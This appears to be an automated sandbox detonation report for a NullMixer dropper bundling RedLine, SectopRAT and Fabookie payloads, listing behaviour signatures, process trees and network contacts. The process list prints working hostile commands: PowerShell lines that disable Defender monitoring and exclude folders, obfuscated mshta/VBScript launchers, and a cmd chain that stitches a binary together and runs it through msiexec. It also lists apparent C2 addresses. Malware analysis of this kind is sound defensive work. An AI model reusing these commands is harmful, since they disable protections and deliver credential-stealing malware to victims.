| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win10v2004-20241007-en
Max time kernel
79s
Max time network
153s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-EOSVR.tmp\Wed09f69eef9c0d5b.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-EOSVR.tmp\Wed09f69eef9c0d5b.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-3HVL9.tmp\Wed09f69eef9c0d5b.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1776 set thread context of 2764 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe |
| PID 2172 set thread context of 4868 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe |
| PID 4216 set thread context of 1608 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0900caa0501dc98f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed091bab77a3bb62d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-3HVL9.tmp\Wed09f69eef9c0d5b.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-EOSVR.tmp\Wed09f69eef9c0d5b.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09ed6b36e57df5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09c4c0c3d01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09d761ab4704dd931.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09c4c0c3d01.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe
"C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09ed6b36e57df5f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0944361c3621a67a6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0900caa0501dc98f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed090db89ca4c58.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09c4c0c3d01.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0983917533e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09d761ab4704dd931.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0968d19e5ec37794.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09f69eef9c0d5b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09fbe3bf81.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09755e77ed017e8af.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed091bab77a3bb62d.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09ed6b36e57df5f.exe
Wed09ed6b36e57df5f.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0900caa0501dc98f.exe
Wed0900caa0501dc98f.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1948 -ip 1948
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0944361c3621a67a6.exe
Wed0944361c3621a67a6.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe
Wed090db89ca4c58.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe
Wed09755e77ed017e8af.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe
Wed0983917533e.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09d761ab4704dd931.exe
Wed09d761ab4704dd931.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09c4c0c3d01.exe
Wed09c4c0c3d01.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe
Wed09fbe3bf81.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed091bab77a3bb62d.exe
Wed091bab77a3bb62d.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe
Wed0968d19e5ec37794.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe
Wed09f69eef9c0d5b.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1948 -s 608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2232 -ip 2232
C:\Users\Admin\AppData\Local\Temp\is-EOSVR.tmp\Wed09f69eef9c0d5b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EOSVR.tmp\Wed09f69eef9c0d5b.tmp" /SL5="$602B8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 356
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe
C:\Users\Admin\AppData\Local\Temp\is-3HVL9.tmp\Wed09f69eef9c0d5b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3HVL9.tmp\Wed09f69eef9c0d5b.tmp" /SL5="$90058,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe" ) do taskkill /f -IM "%~nXN"
C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE
..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA
C:\Windows\SysWOW64\taskkill.exe
taskkill /f -IM "Wed090db89ca4c58.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct( "wSCRIPT.SHEll").RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W ",0 , True ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81&CopY /y /B PUVMYbl.81 +B0zcQ1x.o +490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W&Del /Q *& StaRT msiexec /y ..\_enU.W
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eChO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>PUVMYbL.81"
C:\Windows\SysWOW64\msiexec.exe
msiexec /y ..\_enU.W
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wensela.xyz | udp |
| NL | 45.133.1.107:80 | tcp | |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.2.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | propanla.com | udp |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| N/A | 127.0.0.1:61238 | tcp | |
| N/A | 127.0.0.1:61240 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 51.178.186.149:80 | tcp | |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 208.5.21.104.in-addr.arpa | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 98.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
